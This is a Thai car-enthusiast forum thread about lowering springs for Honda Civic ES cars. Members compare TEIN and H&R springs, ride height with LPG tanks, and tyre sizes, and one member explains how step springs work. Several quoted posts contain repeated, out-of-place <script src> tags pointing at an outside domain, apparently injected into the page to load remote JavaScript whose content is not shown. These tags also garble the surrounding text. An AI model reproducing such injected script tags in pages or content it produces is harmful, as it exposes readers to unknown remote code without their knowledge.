ตอบ
poppy


เข้าร่วม: 16 กุมภา 2011
ตอบ: 1438

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1044
ให้คำขอบคุณ: 1079

ที่อยู่: สุโขทัย - นครสวรรค์ - พิษณุโลก - กำแพงเพชร
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 14 มกรา 2013 13:02 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมใส่ H&R อยู่ครับ ชอบเตี่ยๆ หน่อย แล้วแต่ความชอบครับ..
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 14 มกรา 2013 22:36 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 14 มกรา 2013 23:27 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น
bozazy


ชื่อเล่น: อั่ม

เข้าร่วม: 04 กรกฎา 2012
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 31

ที่อยู่: ระยอง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 09:14 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: athongchum 
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 15 มกรา 2013 09:30 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
Tein ก็คือสปริงเดิมที่สั้นลง หน้าแข็งกว่าเดิมนิดนึง หลังนิ่มกว่าเดิมนิดนึง เตี้ยนิดเดียว ข้อดีที่นึกออกคือเตี้ยงลงนิดนึง เหมากับคนไม่ชอบเตี้ยมาก สปริงหลังแก้อาการเด้งหลังได้นิดนึงเพราะนิ่มกว่าของเดิม

H&R หน้าเตี้ยกว่า Tein สปริงมีขดถี่และขดห่างอยู่ในขดเดียวกัน โตบโจทย์การใช้บนถนนจริงได้ดีกว่า สปริงขดถี่ทำงานเมื่อเจอทางขรุขระช่วยลดการสะเทือนได้ดี สปริงขดห่างจะแข็งกว่าขดถี่รับภาระขณะเข้าโค้งเพราะสปริงขดถี่จะยุบหมด


ปล.ทั้ง 2 ยี่ห้อ ท้ายห้อยทั้งคู่ H&R ห้อยกว่า Tein ความนุ่มความกระด้างพอๆกัน

จบข่าว

จัดเต็ม
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 09:32 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ
ได้รับคำขอบคุณจาก: bozazy  surasaka 
bozazy


ชื่อเล่น: อั่ม

เข้าร่วม: 04 กรกฎา 2012
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 31

ที่อยู่: ระยอง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 10:07 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ


ตื่นเต้นเลยครับ หน้าh&r หลังสปริงเดิม

ขอบคุณล่วงหน้าเลยครับ อยากเห็นๆๆ อยากจะไปใส่บ้างแล้ว


ได้รับคำขอบคุณจาก: athongchum  surasaka 
thesixart


ชื่อเล่น: เบิร์ด

เข้าร่วม: 06 กันยา 2012
ตอบ: 77

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 104
ให้คำขอบคุณ: 0

ที่อยู่: บางนา
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 15 มกรา 2013 10:29 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ




happy กับ hr. ไม๊ครับ คุณเอก ^^
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 10:34 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
thesixart พิมพ์ว่า:
athongchum พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ




happy กับ hr. ไม๊ครับ คุณเอก ^^




ถ้าไปอัดน้ำมันใหม่ให้เท่าเดิมๆน่าจะแฮปปี้มากกว่านี้ แต่ตอนนี้มีเสียงกุกกัก สงสัยจะเป็นที่บูชปีกนกที่ฉีกนั่นแหละ ตังค์หมดซะแล้ว มีตังค์แล้วค่อยทำต่อ
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 10:48 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ


ตื่นเต้นเลยครับ หน้าh&r หลังสปริงเดิม

ขอบคุณล่วงหน้าเลยครับ อยากเห็นๆๆ อยากจะไปใส่บ้างแล้ว




แบบนี้ผมก็ หน้า H&R หลังสปริงเดิม เพราะก็ใส่ 195/50 r15 กว้าง 8 ตามรูปโปรไฟล์ ผมเลยครับ
bozazy


ชื่อเล่น: อั่ม

เข้าร่วม: 04 กรกฎา 2012
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 31

ที่อยู่: ระยอง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:18 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
raksapol พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ


ตื่นเต้นเลยครับ หน้าh&r หลังสปริงเดิม

ขอบคุณล่วงหน้าเลยครับ อยากเห็นๆๆ อยากจะไปใส่บ้างแล้ว




แบบนี้ผมก็ หน้า H&R หลังสปริงเดิม เพราะก็ใส่ 195/50 r15 กว้าง 8 ตามรูปโปรไฟล์ ผมเลยครับ




หน้า-หลังสอดนิ้วได้กี่นิ้วอ่ะครับ รูปไกลไปนิดนึงอ่ะ
รึว่าผมสายตาสั้นป่าวนะ <script src="https://sport32news.com/civicesgroup.js"></
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 11:53 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
bozazy พิมพ์ว่า:
raksapol พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
bozazy พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
ตอนนี้ ผมใส่แม็กขอบ 15 อยู่ครับ ถ้าผมไปใส่ H&R มันจะเตี้ยมากป่าวครับ




ขอบ 15 ใส่ H&R สวยสุดล่ะครับ เตี้ยสุดเท่าที่ลองมา 3 ยี่ห้อ Eibach Tein จบที่ H&R แต่มันก็ไม่ได้เตี้ยมากครับถ้าไม่เลื่อนเบ้า กำลังดีเลย

ยาง 195/55 สองนิ้วสอดพอดีกับสปริงหลังเดิมเพราะหลังสูงน้ำหนักเทไปด้านหน้า ถ้าหลังโหลดด้วยหน้าจะสูงขึ้นอีกนิดนึงครับเพราะน้ำหนักจะเทไปด้านหลังมากขึ้น




ตอนนี้ใส่หน้า h&r แล้วหลังสปริงเดิมหรอครับ หน้ากับหลังสูงต่างกันเท่าไรครับ แล้วติดแกสป่ะครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ตอนนี้ผมใส่ h&r ทั้งหน้า-หลัง แต่มีถังแกสด้วย ทำให้ท้ายเตี้ยกว่า 1cm
อยากใส่สปริงเดิมข้างหลังอยู่แต่กลัวตูดโด่ง
ถ้ามีรูปขอชมได้มั้ยครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



กำลังสวยเลยครับ เดี๋ยววันนี้ถ่ายให้ดู เมื่อวานลืมครับ


ตื่นเต้นเลยครับ หน้าh&r หลังสปริงเดิม

ขอบคุณล่วงหน้าเลยครับ อยากเห็นๆๆ อยากจะไปใส่บ้างแล้ว




แบบนี้ผมก็ หน้า H&R หลังสปริงเดิม เพราะก็ใส่ 195/50 r15 กว้าง 8 ตามรูปโปรไฟล์ ผมเลยครับ




หน้า-หลังสอดนิ้วได้กี่นิ้วอ่ะครับ รูปไกลไปนิดนึงอ่ะ
รึว่าผมสายตาสั้นป่าวนะ <script src="https://sport32news.com/civicesgroup.js"></


ของผมยังเปงสปริงเดิมครับทั้งหน้าทั้งหลัง ผมรอดูรูปพี่เค้าอยู่ครับ
bozazy


ชื่อเล่น: อั่ม

เข้าร่วม: 04 กรกฎา 2012
ตอบ: 81

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 69
ให้คำขอบคุณ: 31

ที่อยู่: ระยอง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 11:59 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
อ้อ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 12:12 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ลองดูรูปนี้ไปก่อนครับ หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2



สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ได้รับคำขอบคุณจาก: yoyosonic 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 15:19 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
มาแล้ว

รูปบน หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2 ถังโดนัท 43L

รูปล่าง หน้า H&R หลังเดิม น้ำมัน 1/3 แก๊ส เต็ม ถังโดนัท 43L


รูปบน หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2 ถังโดนัท 43L

รูปล่าง หน้า H&R หลังเดิม น้ำมัน 1/3 แก๊ส เต็ม ถังโดนัท 43L
รูปบน หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2 ถังโดนัท 43L

รูปล่าง หน้า H&R หลังเดิม น้ำมัน 1/3 แก๊ส เต็ม ถังโดนัท 43L
ได้รับคำขอบคุณจาก:   keacobain  yoyosonic  chan-o  nu_es_05 
keacobain


เข้าร่วม: 04 มีนา 2012
ตอบ: 271

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 140
ให้คำขอบคุณ: 274

ที่อยู่: กทม-ศรีราชา(บ่อวิน)
ปี: 2003
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อังคาร, 15 มกรา 2013 17:44 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
มาแล้ว

รูปบน หน้า Tein หลังเดิม น้ำมัน 1/3 แก๊ส 1/2 ถังโดนัท 43L

รูปล่าง หน้า H&R หลังเดิม น้ำมัน 1/3 แก๊ส เต็ม ถังโดนัท 43L



มาแอบดูด้วยคน ขอบคุณครับกระจ่างเลย
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 21:30 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
rsr หน้าทิ่ม ตุดโด่ง
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 23:04 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
รถผมไม่ติดแก๊ส ถ้าผมไปใส่ H&R  หน้าหลัง มันจะดูออกมาพอดีไม่ครับ  ยาง195/50 ท้ายไม่หน้าต่ำกว่าหน้าน่ะครับ  
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 00:16 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
raksapol พิมพ์ว่า:
รถผมไม่ติดแก๊ส ถ้าผมไปใส่ H&R  หน้าหลัง มันจะดูออกมาพอดีไม่ครับ  ยาง195/50 ท้ายไม่หน้าต่ำกว่าหน้าน่ะครับ  


H&R หน้าหลัง ยังไงก็ท้ายห้อยครับ มี 2 ทางเลือกที่ทำได้

1.H&R หน้าหลัง หลังเลื่อนเบ้าขึ้น หรือใส่สเปเซอร์ หรือสวมปลอก
2.H&R หน้า หลังสปริงเดิม หลังเลื่อนเบ้าลง

ถ้ามีงบแนะนำแบบ 1 ดีกว่าครับ เพราะสปริง H&R เป็นแบบ Step Spring ขับช้าๆและเข้าโค้งได้ดีกว่าสปริงเดิม แต่แนะนำแค่เลื่อนเบ้าขึ้นหรือสวมปลอก


สปริงแบบ Step Spring คืออะไร ลองอ่านดูครับ

Step Spring   คือสปริงที่มีระยะห่างระหว่างขดแบ่งออกเป็น 2 ระยะ คือมีทั้งขดถี่และห่างในวงเดียวกัน เช่นห่างกัน 15 และ 25 ม.ม.เท่ากับว่าสปริงนี้มีค่า k  2 ค่าในวงเดียวกัน  เมื่อมีน้ำหนักมากดทับ ขดที่ถี่กว่าจะยุบตัวก่อน (ค่า  k น้อย) จนเมื่อน้ำหนักมากขึ้นขดสปริงที่ห่าง(ค่า k มาก)จะมารับช่วงต่อเป็นการทำงานที่ต่อเนื่อง และประสานความนุ่มนวลขณะคลาน และมั่นคงในการขับขี่ขณะกดคันเร่งลึกๆ
ได้รับคำขอบคุณจาก: yoyosonic  chan-o 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 16 มกรา 2013 07:48 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
เยี่ยมเลยสำหรับข้อมูลครับ เอาและตอนนี้เริ่มตัดสินใจได้แล้วว่าต้องทำไงต่อๆๆๆ อิอิอิอิ
ได้รับคำขอบคุณจาก: athongchum 
petongzaa


ชื่อเล่น: เปตอง

เข้าร่วม: 20 ธันวา 2011
ตอบ: 660

Guru ES
Guru ES

ได้รับคำขอบคุณ: 616
